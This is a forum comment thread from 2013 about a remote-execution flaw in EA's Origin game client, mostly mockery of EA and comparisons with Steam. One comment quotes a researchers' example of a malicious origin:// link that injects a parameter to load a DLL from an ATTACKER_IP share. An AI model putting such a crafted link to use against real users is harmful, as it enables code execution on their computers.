16 Replies. 1 pages. Viewing page 1.
< Newer [ 1 ] Older >
 |
| 16. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 17:52 |
Clancy |
|
|
Yeah, pretty much the same issue steam had.
All these clients need to operate in a sand box, and not touch anything else.
|
|
|
|
|
|
|
|
| |
|
| 15. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 14:32 |
avianflu |
|
|
the underlying more serious issue is that all network game clients have too many non-obvious tendrils threaded into the system kernel and web browsers.
In this instance the issue is that, anytime after installing the game client, you have the "feature" of being able to launch a game installed on your computer thru a URL on a web page.
It is just a matter of time for Origin or Steam or UPLay to become a genuine matter of concern to us all. |
|
|
|
|
|
|
|
| |
|
| 14. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 11:10 |
Creston |
|
|
xXBatmanXx wrote on Mar 18, 2013, 22:44:
Most people are safe though, because there is a queue to run the remote execution. By the time the hacker gets a chance at your account, you are probably logged out of Origin. 
*Gigglesnort*
Good one
Creston |
|
|
|
|
|
|
|
| |
|
| 13. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 11:09 |
Creston |
|
|
Verno wrote on Mar 19, 2013, 10:46:
Not a big deal, EA will fix it up.
Yeah, they'd be stupid to leave that bug in there now that it's public knowledge. IIRC, it didn't take Valve that long to fix it?
Creston |
|
|
|
|
|
|
|
| |
|
| 12. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 10:46 |
Verno |
|
|
| Not a big deal, EA will fix it up. |
|
|
|
|
|
|
|
|
Playing: Faster Than Light, Tales of Graces F, Fire Emblem 3DS
Watching: Ghost in the Shell, Hannibal, Oblivion |
|
|
|
|
| |
|
| 11. |
Re: More Big Picture Details |
Mar 19, 2013, 10:29 |
HorrorScope |
|
|
| I have never been attacked in this manner. Hard to get really nervous about it. I should worry more about driving to appointments today, if I go by the numbers. |
|
|
|
|
|
|
|
| |
|
| 10. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 04:18 |
InBlack |
|
|
"Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."
Translation: As long as you keep giving us money for buggy non functional software we dont really give a shit and we will gladly take more. |
|
|
|
|
|
|
|
|
| I have a nifty blue line! |
|
|
|
|
| |
|
| 9. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 04:07 |
DangerDog |
|
|
The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer
so you need to have an "evil" dll installed on your system, and click on a malformed link to get the code executed.
I'm not going to lose any sleep over that one, people trying to run pirated Origin games beware though - so easy to sneak a dll into the install. |
|
|
|
|
|
|
|
| |
|
| 8. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 03:57 |
Pumas |
|
|
| If remote execution means shoot it with a sniper rifle, then I'm for it. |
|
|
|
|
|
|
|
|
| How will I know limits from lies if I never try? |
|
|
|
|
| |
|
| 7. |
Re: Origin Vulnerable to Remote Execution |
Mar 19, 2013, 00:49 |
Jivaro |
|
|
deqer wrote on Mar 18, 2013, 23:54:
EA, you're 10 years behind Steam even when you get hacked! lulz
fixed.  |
|
|
|
|
|
|
|
| |
|
| 6. |
Re: Origin Vulnerable to Remote Execution |
Mar 18, 2013, 23:54 |
deqer |
|
|
EA, you're 10 years behind Steam. lulz
|
|
|
|
|
|
|
|
| |
|
| 5. |
Re: Origin Vulnerable to Remote Execution |
Mar 18, 2013, 22:44 |
xXBatmanXx |
|
|
| Most people are safe though, because there is a queue to run the remote execution. By the time the hacker gets a chance at your account, you are probably logged out of Origin. |
|
|
|
|
|
|
|
|
In this present crisis, government is not the solution to our problem; government is the problem. / Few men have virtue enough to withstand the highest bidder.
Playing: RL |
|
|
|
|
| |
|
| 4. |
Re: Origin Vulnerable to Remote Execution |
Mar 18, 2013, 22:05 |
nin |
|
|
Just like Steam was/is,
Yeah, sounds identical.
|
|
|
|
|
|
|
|
|
RollinThundr Apr 17, 2013, 12:25: Eh really tossing stuff like that in there only to get your panties all bunched up. If you really want to call that trolling sure.
Mr. Tact Apr 17, 2013, 12:33: Pretty sure that's the definition of trolling... |
|
|
|
|
| |
|
| 3. |
Re: Origin Vulnerable to Remote Execution |
Mar 18, 2013, 21:56 |
Prez |
|
|
| Just like Steam was/is, and probably not worth worrying about. Just don't leave it running, and, if you are really paranoid, manually stop and start the Origin service in taskmanager as needed. |
|
|
|
|
|
|
|
| |
|
| 2. |
Re: Origin Vulnerable to Remote Execution |
Mar 18, 2013, 21:21 |
Saboth |
|
|
| "As part of our vision for Origin, we've made it easier to connect with random friends on the internet, through your computer." |
|
|
|
|
|
|
|
| |
|
| 1. |
Re: Origin Vulnerable to Remote Execution |
Mar 18, 2013, 21:07 |
Longswd |
|
|
"Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."
Seeings as how they became aware of this through a demonstration, I would say it's no longer "hypothetical".
|
|
|
|
|
|
|
|
|
| I don't always drink carbonated Mexican rat piss, but when I do, I prefer Dos Equis. |
|
|
|
|
| |
16 Replies. 1 pages. Viewing page 1.
< Newer [ 1 ] Older >
|
|
Twitter 
